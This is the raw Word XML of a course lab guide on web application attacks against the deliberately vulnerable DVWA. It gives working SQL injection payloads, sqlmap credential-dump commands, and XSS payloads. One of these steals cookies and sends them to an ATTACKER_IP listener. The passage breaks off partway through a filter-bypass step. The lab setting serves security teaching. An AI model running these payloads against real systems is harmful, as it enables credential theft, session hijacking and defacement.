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5533" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading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Week 9: Lab Activities - Advanced Web Application Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A5849C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Complete Step-by-Step Lab Guide with Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2DBA2" w14:textId="338367D4" w:rsidR="002C7482" w:rsidRPr="002C7482" w:rsidRDefault="002C7482">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7482">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Note: This lab does not have any weightage in total marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD0A8B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2CB709D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DEA6756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Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B3D5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6CBDDA92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VirtualBox or VMware Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76FF4F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Kali Linux VM (attacker machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D65AC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DVWA (Damn Vulnerable Web Application) VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A24782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bWAPP (buggy Web Application) installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E1FC5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Burp Suite Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B357E5D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Firefox browser with security extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D9FA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Initial Setup Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D22E31E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Ensure network connectivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> between VMs on same subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FF61A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Note the IP address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of DVWA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on DVWA machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68411531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Configure Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy on attacker machine (localhost:8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6D929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Enable proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Firefox: Settings &gt; Network Settings &gt; Manual proxy (127.0.0.1:8080)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0455C401" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3345F51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94D0020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1: SQL Injection Attacks on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ABA72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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F73B2" w14:textId="69F674A5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Master SQL injection exploitation techniques</w:t>
      </w:r>
      <w:r w:rsidR="00A65FA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including manual and automated approaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382623B2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1A: Basic SQL Injection (Manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3427B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Access DVWA Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3D52C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Open Firefox and navigate to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/DVWA/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875B5FB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Login with credentials: Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D30C1D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Navigate to "SQL Injection" from the left menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19849BA4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Ensure Security Level is set to "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5393A9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Identify Vulnerable Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14546CE6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page displays a "User ID" input field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2775E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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and observe the output showing user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A1362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input field is the attack vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996865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Craft Basic SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABCAF5" w14:textId="06E3513A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Clear the field and enter: </w:t>
      </w:r>
      <w:r w:rsidR="00BF09CA">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BF09CA">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F960AAB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"Submit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A243117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Expected Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Database returns all user records (bypasses WHERE clause)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C1991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 query becomes: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE user_id = '1' OR '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDC43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Extract Database Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C5096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Enter: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' UNION SELECT NULL,table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ('information_schema','mysql') --</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="05FC5A98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 database structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C335D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reveals database names and tables available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB4ED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Union-Based Injection for Data Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBDEE7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First determine column count by entering: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' UNION SELECT 1,2,3 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F330D1F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successful, displays column numbers; if error, adjust count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B49DC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Once column count confirmed (typically 2), enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D50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1' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema=database() --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424D360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lists all columns in current database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDE429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6: Extract Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6F460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Determine username and password columns from users table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9EDE7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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' UNION SELECT user, password FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB88764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Critical Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Database stores passwords (likely hashed or plaintext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242EE451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the usernames and password hashes for analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9BADD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7: Comment Out Remaining Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882760B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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' UNION SELECT version(),database() --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF761F5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 MySQL version and database name displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6075C54D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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comments out remaining SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211EF7E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1B: Time-Based Blind SQL Injection (Manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C187BEF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Navigate to Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125749B5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DVWA, select "SQL Injection (Blind)" from menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B35BFA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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DC5AA4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challenge has no visible output except "User exists" or "User does not exist"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E10BC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Confirm Blind Injection Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524B6E4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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C892450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the response (should show "User exists")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144308F3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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB1DBA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the response (should show "User does not exist")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27706567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Exploit with Boolean-based Blind SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEEB6C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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA6141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 response: "User exists" (condition is TRUE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01DE57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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' AND '1'='2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBA6D0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 response: "User does not exist" (condition is FALSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB7977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Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Confirmed blind SQL injection through boolean responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6FA677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Extract Data Using Boolean Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F521413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 if username is "admin":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8E5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1' AND (SELECT COUNT(*) FROM users WHERE user LIKE 'a%') &gt; 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE98670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Response "User exists" means usernames starting with 'a' exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D76B33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 progressively: 'ab%', 'ad%', 'adm%', 'admi%', 'admin%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D386EAC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Once confirmed, test other username formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FAB2F1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Extract Password Hashes Using Time-Based Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AFCE7F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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1' AND SLEEP(5) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791BD39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 response takes 5+ seconds to return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14FA71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confirms time-based blind injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D88682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 constructed queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD11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1' AND IF(SUBSTRING(password,1,1)='2',SLEEP(5),0) FROM users WHERE user='admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BFBA1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If response delays 5 seconds, first character is '2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54412AE6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Increment through ASCII characters to identify each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317AA7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1C: Automated SQL Injection with SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF3B389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Identify Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B3E80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Burp Suite and set proxy to listen on localhost:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D98306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Navigate to DVWA SQL Injection with Security Level "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138464CF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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in User ID field and submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591C14B1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Capture the request in Burp Suite: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>GET /DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2552ACAF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Right-click captured request → Copy to clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB77C01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Launch SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D28AC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terminal in Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE477F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a request file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F994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cat &gt; sqli_request.txt &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB36F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GET /DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC69B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Host: DVWA_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746E9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Cookie: PHPSESSID=your_session_id; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366EAE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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C5567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Replace DVWA_IP and PHPSESSID with actual values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D052996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Run SQLMap Basic Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1918D1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Execute command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9BB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sqlmap -r sqli_request.txt -p id --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01CD10" w14:textId="77777777" w:rsidR="0000000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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3324CA43" w14:textId="77777777" w:rsidR="000000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-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Use request from file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570321A" w14:textId="77777777" w:rsidR="000000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-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Target parameter (id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3EC70A" w14:textId="77777777" w:rsidR="000000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--batch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Auto-select default answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66C24A" w14:textId="77777777" w:rsidR="00000000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Expected Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: SQLMap identifies injection vulnerability and exploitation method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54389428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Database Enumeration with SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998A55D" w14:textId="77777777" w:rsidR="0000000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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CAA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sqlmap -r sqli_request.txt -p id --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC195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Lists all databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726519C9" w14:textId="77777777" w:rsidR="00000000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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B25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sqlmap -r sqli_request.txt -p id -D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBD9C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Lists tables in dvwa database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF6FEE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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5CB0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sqlmap -r sqli_request.txt -p id -D dvwa -T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA0BDB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Lists columns in users table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23059B44" w14:textId="77777777" w:rsidR="00000000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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292236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sqlmap -r sqli_request.txt -p id -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F170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Dumps all user credentials from users table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243F6A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Advanced SQLMap Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459856F" w14:textId="77777777" w:rsidR="00000000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For more aggressive scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960D2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sqlmap -r sqli_request.txt -p id --risk=3 --level=5 --dump-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271ED01" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000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 for multiple vulnerability types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E2F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sqlmap -r sqli_request.txt -p id --technique=BEUSTQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89AB6A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(B=Boolean, E=Error, U=Union, S=Stacked, T=Time-based, Q=Inline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E81C073" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Write dumped data to file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C0C5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sqlmap -r sqli_request.txt -p id --dbs -o dvwa_databases.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862FC0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1 Documentation Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A938D" w14:textId="77777777" w:rsidR="00000000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DVWA login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB2BF6" w14:textId="77777777" w:rsidR="00000000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basic SQL injection result (OR '1'='1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C26EDB" w14:textId="77777777" w:rsidR="00000000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UNION SELECT output showing database structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23B660" w14:textId="77777777" w:rsidR="00000000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extracted credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B187397" w14:textId="77777777" w:rsidR="00000000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SQLMap enumeration results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417454B" w14:textId="77777777" w:rsidR="00000000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Write explanation of how each attack works (200 words minimum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA1534" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0D3120A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29C4642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Lab 2: Cross-Site Scripting (XSS) Attack Vectors on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404007B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737440EF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Demonstrate reflected, stored, and DOM-based XSS vulnerabilities with practical payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBF8A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2A: Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFD565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Access Reflected XSS Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A67A6" w14:textId="77777777" w:rsidR="00000000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DVWA, select "Reflected Cross Site Scripting (XSS)" from menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52870AC5" w14:textId="77777777" w:rsidR="00000000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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4FBA3" w14:textId="77777777" w:rsidR="00000000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page has a text input field with message display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37266E69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Basic XSS Alert Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586695F3" w14:textId="77777777" w:rsidR="00000000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 the input field, enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS Vulnerability Found')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72936304" w14:textId="77777777" w:rsidR="00000000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"Submit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A8532" w14:textId="77777777" w:rsidR="00000000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Expected Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: JavaScript alert box displays with custom message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E482A5" w14:textId="77777777" w:rsidR="00000000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confirms script execution in user's browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D749F41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Cookie Stealing Payload (Proof of Concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E33A4" w14:textId="77777777" w:rsidR="00000000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this payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFE8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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2F2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document.location='http://ATTACKER_IP:8000/?cookie='+document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745156D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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D0A42" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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First, set up a simple HTTP server to capture the request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF80E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python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27022D83" w14:textId="77777777" w:rsidR="00000000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When victim clicks link with payload, check server logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998C885" w14:textId="77777777" w:rsidR="00000000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Observation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Cookie data appears in server logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551463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DOM Manipulation XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEC8A0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Enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="document.body.innerHTML='&lt;h1&gt;Site Defaced&lt;/h1&gt;'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E638182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Expected Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Page content is replaced with defacement message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C3AD4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shows potential for malicious page modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519D8B8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Event Handler Variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9BCE80" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Test multiple event handlers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E0587" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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&lt;body onload="alert('XSS via onload')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336DDC9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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&lt;svg onload="alert('XSS via SVG')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE76EBE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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&lt;iframe src="javascript:alert('XSS via iframe')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B903947" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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which ones execute successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F232DC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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the application response type (Does it warn? Block? Allow?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495E22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6: Bypass Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751125BD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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simple payload is blocked, try variations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1B960" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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HTML encoding: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
